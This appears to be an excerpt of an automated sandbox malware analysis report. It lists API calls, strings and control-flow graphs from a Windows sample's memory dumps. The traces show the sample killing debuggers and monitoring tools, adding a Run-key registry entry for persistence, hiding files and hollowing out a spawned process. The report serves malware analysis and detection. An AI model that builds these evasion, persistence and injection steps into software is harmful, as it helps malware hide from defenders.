                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: OpenProcess.KERNEL32 ref: 00007FF7DBD53EA7
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: TerminateProcess.KERNEL32 ref: 00007FF7DBD53ECA
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: CloseHandle.KERNEL32 ref: 00007FF7DBD53ED8
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: Process32NextW.KERNEL32 ref: 00007FF7DBD53EEB
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: CloseHandle.KERNEL32 ref: 00007FF7DBD53EFD
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD539B4: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF7DBD53B0C), ref: 00007FF7DBD539E4
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 00007FF7DBD531C6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                          • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                          • API String ID: 2853470409-928700279
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID: rbNSpGEsyb
                                                                                                                                                                                                                          • API String ID: 299056699-189039185
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1083639309-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 299056699-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                          • String ID: Unknown
                                                                                                                                                                                                                          • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                          • API String ID: 779948276-85274793
                                                                                                                                                                                                                          • Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                                          • Instruction ID: a7135c092d212117b637128faae009ef229128e13b03016af6c1e0df400f3893
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B01D776618A808AD7509B18E48471EB7A4F789794FD01236EA8D43B68DF7DC145CB10
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2850635065-0
                                                                                                                                                                                                                          • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction ID: faa62cb09cf42e3d56daedf0d34cba02d5a271a9a0d10a17714ae04e420a202b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9411E27160CA8581E7749B19E48836EA3E0FB85754FD04236D69D426A8DF3DD504CF20
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                          • API String ID: 779948276-1428018034
                                                                                                                                                                                                                          • Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                                          • Instruction ID: c4168892f93a5a73ee42d45cc719b850ddbd27538bf41da5a97d251b0001d428
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA11513252CB4086D7949B18F48066EB7A0FB857A0F905331F9AE43BB8DF6CD044CB10
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD5390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD5396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53995
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD546E4: CreateFileW.KERNEL32 ref: 00007FF7DBD5472B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD540E4: GetCurrentProcess.KERNEL32 ref: 00007FF7DBD5414B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD540E4: OpenProcessToken.ADVAPI32 ref: 00007FF7DBD5415E
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD540E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7DBD54186
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD540E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7DBD541B1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD540E4: CloseHandle.KERNEL32 ref: 00007FF7DBD541BC
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD540E4: OpenProcess.KERNEL32 ref: 00007FF7DBD541D1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD540E4: CloseHandle.KERNEL32 ref: 00007FF7DBD54249
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 00007FF7DBD53037
                                                                                                                                                                                                                          • HeapFree.KERNEL32 ref: 00007FF7DBD5304A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                                                                          • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                          • API String ID: 3992431006-2286007224
                                                                                                                                                                                                                          • Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                                          • Instruction ID: ebf63646d321700af31b5c75232ddc04ada3984c431b44a20a07fa9acd7e69a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2411C534A1CA8385E658FB58E8C43AEB7E0FB86704FE04136D55D46675DF3CA0598B60

                                                                                                                                                                                                                          Callgraph


                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 231 7ff7a91b345c-7ff7a91b3472 call 7ff7a91b10a0 call 7ff7a91b321c 236 7ff7a91b3474-7ff7a91b3476 ExitProcess 231->236 237 7ff7a91b347c-7ff7a91b34aa call 7ff7a91b4264 call 7ff7a91b3ce4 call 7ff7a91b3f14 231->237 244 7ff7a91b34fb-7ff7a91b350e call 7ff7a91b3f14 237->244 245 7ff7a91b34ac-7ff7a91b34bd call 7ff7a91b43a4 237->245 252 7ff7a91b3510-7ff7a91b3521 call 7ff7a91b43a4 244->252 253 7ff7a91b354c-7ff7a91b355f call 7ff7a91b3f14 244->253 250 7ff7a91b34d2-7ff7a91b34d4 ExitProcess 245->250 251 7ff7a91b34bf-7ff7a91b34d0 call 7ff7a91b43a4 245->251 251->250 260 7ff7a91b34da call 7ff7a91b32ec 251->260 263 7ff7a91b3523-7ff7a91b3525 ExitProcess 252->263 264 7ff7a91b352b call 7ff7a91b327c 252->264 261 7ff7a91b3561-7ff7a91b3572 call 7ff7a91b43a4 253->261 262 7ff7a91b35a2-7ff7a91b35b8 call 7ff7a91b3a74 call 7ff7a91b33ec 253->262 271 7ff7a91b34df-7ff7a91b34e4 260->271 278 7ff7a91b3574-7ff7a91b3576 ExitProcess 261->278 279 7ff7a91b357c call 7ff7a91b327c 261->279 282 7ff7a91b35ba-7ff7a91b35cb call 7ff7a91b43a4 262->282 283 7ff7a91b360e-7ff7a91b36d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 262->283 269 7ff7a91b3530-7ff7a91b3535 264->269 273 7ff7a91b3544-7ff7a91b3546 ExitProcess 269->273 274 7ff7a91b3537-7ff7a91b3542 Sleep 269->274 276 7ff7a91b34e6-7ff7a91b34f1 Sleep 271->276 277 7ff7a91b34f3-7ff7a91b34f5 ExitProcess 271->277 274->269 276->271 284 7ff7a91b3581-7ff7a91b3586 279->284 289 7ff7a91b35e0-7ff7a91b35e2 ExitProcess 282->289 290 7ff7a91b35cd-7ff7a91b35de call 7ff7a91b43a4 282->290 286 7ff7a91b3595-7ff7a91b3597 ExitProcess 284->286 287 7ff7a91b3588-7ff7a91b3593 Sleep 284->287 287->284 290->289 293 7ff7a91b35e8 call 7ff7a91b32ec 290->293 295 7ff7a91b35ed-7ff7a91b35f2 293->295 296 7ff7a91b3601-7ff7a91b3603 ExitProcess 295->296 297 
7ff7a91b35f4-7ff7a91b35ff Sleep 295->297 297->295
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
• Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                          • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                          • API String ID: 613740775-1953711635

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 434396405-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3920101602-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4294037311-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 328 7ff7a91b1050-7ff7a91b108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2574300362-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 329 7ff7a91b3b24-7ff7a91b3b33 330 7ff7a91b3b35-7ff7a91b3b42 VirtualFree 329->330 331 7ff7a91b3b48-7ff7a91b3b4c 329->331 330->331
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.2163008511.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
• Associated: 0000000D.00000002.2162958449.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163050514.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163081704.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163110058.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2163137865.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                                          • Instruction ID: 74a2e36950f8e299ce9892203c61c3ebca8bfa78e19ac58bbe518265a6878e57
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7D01311E3594181E755AF16F445715D3B1FBC4744FC08035E58981574CF3CD0B58F10

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 332 7ff7a91b2048-7ff7a91b20c2 GetModuleFileNameW 333 7ff7a91b20c4 332->333 334 7ff7a91b20c9-7ff7a91b2105 332->334 335 7ff7a91b296d-7ff7a91b2975 333->335 336 7ff7a91b2107-7ff7a91b210f 334->336 337 7ff7a91b211d-7ff7a91b2139 call 7ff7a91b1f88 334->337 338 7ff7a91b2111-7ff7a91b2119 336->338 339 7ff7a91b213b-7ff7a91b2157 call 7ff7a91b1fc8 336->339 346 7ff7a91b217c-7ff7a91b2186 337->346 341 7ff7a91b2159-7ff7a91b2175 call 7ff7a91b2008 338->341 342 7ff7a91b211b-7ff7a91b2177 338->342 339->346 341->346 342->335 350 7ff7a91b2188 346->350 351 7ff7a91b218d-7ff7a91b21e1 CreateProcessW 346->351 350->335 352 7ff7a91b21e3 351->352 353 7ff7a91b21e8-7ff7a91b2228 CreateFileW 351->353 352->335 354 7ff7a91b222f-7ff7a91b224b GetFileSize 353->354 355 7ff7a91b222a 353->355 356 7ff7a91b2257-7ff7a91b2262 CloseHandle 354->356 357 7ff7a91b224d-7ff7a91b2255 354->357 355->335 356->335 357->356 358 7ff7a91b2267-7ff7a91b228f VirtualAlloc 357->358 359 7ff7a91b22a1-7ff7a91b22cc ReadFile 358->359 360 7ff7a91b2291-7ff7a91b229c CloseHandle 358->360 361 7ff7a91b22f1-7ff7a91b233f CloseHandle GetThreadContext 359->361 362 7ff7a91b22ce-7ff7a91b22ec VirtualFree CloseHandle 359->362 360->335 363 7ff7a91b2341-7ff7a91b2354 VirtualFree 361->363 364 7ff7a91b2359-7ff7a91b23de ReadProcessMemory GetModuleHandleA GetProcAddress 361->364 362->335 363->335 366 7ff7a91b23e0-7ff7a91b23f3 VirtualFree 364->366 367 7ff7a91b23f8-7ff7a91b2461 VirtualAllocEx 364->367 366->335 368 7ff7a91b2463-7ff7a91b2476 VirtualFree 367->368 369 7ff7a91b247b-7ff7a91b24af WriteProcessMemory 367->369 368->335 370 7ff7a91b24b1-7ff7a91b24c4 VirtualFree 369->370 371 7ff7a91b24c9-7ff7a91b24d4 369->371 370->335 372 7ff7a91b24e6-7ff7a91b24f9 371->372 373 7ff7a91b24ff-7ff7a91b2588 WriteProcessMemory 372->373 374 
7ff7a91b25a7-7ff7a91b25ee 372->374 375 7ff7a91b25a2 373->375 376 7ff7a91b258a-7ff7a91b259d VirtualFree 373->376 377 7ff7a91b2600-7ff7a91b2613 374->377 375->372 376->335 379 7ff7a91b2619-7ff7a91b2668 RtlCompareMemory 377->379 380 7ff7a91b2898-7ff7a91b291c WriteProcessMemory SetThreadContext 377->380 381 7ff7a91b266a 379->381 382 7ff7a91b266c-7ff7a91b2695 379->382 383 7ff7a91b2933-7ff7a91b2943 ResumeThread 380->383 384 7ff7a91b291e-7ff7a91b2931 VirtualFree 380->384 381->377 386 7ff7a91b26a0-7ff7a91b26ae 382->386 387 7ff7a91b2945-7ff7a91b2958 VirtualFree 383->387 388 7ff7a91b295a-7ff7a91b2967 VirtualFree 383->388 384->335 389 7ff7a91b2893 386->389 390 7ff7a91b26b4-7ff7a91b273f 386->390 387->335 388->335 389->380 391 7ff7a91b2751-7ff7a91b275f 390->391 392 7ff7a91b2765-7ff7a91b2798 391->392 393 7ff7a91b288e 391->393 394 7ff7a91b279a 392->394 395 7ff7a91b279c-7ff7a91b286f ReadProcessMemory WriteProcessMemory 392->395 393->386 394->391 397 7ff7a91b2871-7ff7a91b2884 VirtualFree 395->397 398 7ff7a91b2889 395->398 397->335 398->393
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
